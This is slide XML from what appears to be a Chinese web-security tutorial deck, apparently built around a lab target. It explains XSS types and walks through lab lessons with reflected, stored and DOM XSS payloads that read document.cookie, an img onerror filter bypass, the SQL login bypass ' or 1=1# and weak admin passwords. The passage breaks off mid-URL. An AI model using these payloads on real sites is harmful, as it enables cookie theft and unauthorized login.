            <a:ext cx="10131425" cy="386875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871B31F4-AD75-461B-99E9-27B16C726940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346364" y="942109"/>
            <a:ext cx="11665527" cy="5680364"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，即跨站脚本攻击，某种意义上也是一种注入攻击，是指攻击者在页面中注入恶意的脚本代码，当受害者访问该页面时，恶意代码会在其浏览器上执行，需要强调的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不仅仅限于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，还包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等其它脚本语言。根据恶意代码是否存储在服务器中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以分为存储型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与反射型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型（非持久）：主要用于将恶意代码附加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址的参数中，常用于窃取客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息和钓鱼欺骗。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型（持久型）：攻击者将恶意代码注入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器中并保存起来，只要客户端访问了相应的页面就会受到攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意： 不要使用较新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注：网上教程很多，比较详细，大家可以自行百度。</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5065392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22799-3584-4038-8D6F-4C1CF3795C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030287" y="304800"/>
            <a:ext cx="10131425" cy="332509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-09_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7092D3-F63B-4949-B3B4-2A4F95AB02CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290945" y="1607127"/>
            <a:ext cx="11610110" cy="4946073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://192.168.80.136/control/xss/xss_1.php?id=&lt;script&gt;alert(/crow/)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://192.168.80.136/control/xss/xss_1.php?id=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2321697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22799-3584-4038-8D6F-4C1CF3795C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030287" y="304800"/>
            <a:ext cx="10131425" cy="332509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-10_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7092D3-F63B-4949-B3B4-2A4F95AB02CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290945" y="1607127"/>
            <a:ext cx="11610110" cy="4946073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拉倒最后的留言板：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2349142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4F9D07-7B83-4094-990B-C9E6EB711B15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="497711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-11_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>万能密码登陆</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB84A140-51A4-4F96-B7AB-EF13BAAB07CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138545" y="914401"/>
            <a:ext cx="11831782" cy="5708072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = "SELECT * FROM user WHERE username = ' ' AND password = ' ' ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见的万能密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/Downtime/p/7648182.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接使用弱口令：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>admin,admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/admin888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者使用万能密码： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ or 1=1#/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随意填写</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试爆破</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3708268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4A9E26-EDA4-4093-A052-2D1B8755949A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="428438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>声明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重要！！！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9653EBD5-7012-419F-B353-B1891138C186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本次教程中的所有行为均遵循中华人民共和国网络安全法，本次教程的目的仅限用于分享和学习！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本教程中其中有些许知识引用于网络，若未及时标注，请您与我联系。也希望大家尊重知识产权。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>视频中如果有错误的地方请多多批评指正，我会第一时间进行修改。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="622862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E94368-80CD-4A88-85C6-FCCF54E5829C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="442293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-12_DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA557AF-63E2-435B-A75E-ECFEA0172AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277091" y="1205345"/>
            <a:ext cx="11582400" cy="5235966"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其实是一种特殊类型的反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档对象模型的一种漏洞。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现都在前台执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体讲解请自行百度！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先在文本框里面随便输入，查看源代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;input name="search" type="text" value="ABCDEFG" required=""&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们将其闭合：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将其放在搜索框里即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4038217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ECD094-B41C-4D8A-8ED5-28429972CA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="331456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-13_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D2B26B-4ED9-4CDB-B0A4-A71758B4547E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138545" y="1108365"/>
            <a:ext cx="11873346" cy="5430980"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接使用上一节使用的函数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示请不要包含恶意函数，考虑绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   首先分解： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时显示不要包含恶意函数，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>alert(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行大小写，发现还是不行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时我们更换标签： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;img src=1 onerror=alert(/xss/)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时将里面的值更换即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://192.168.80.136/control/xss/filter_xss.php?id=&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
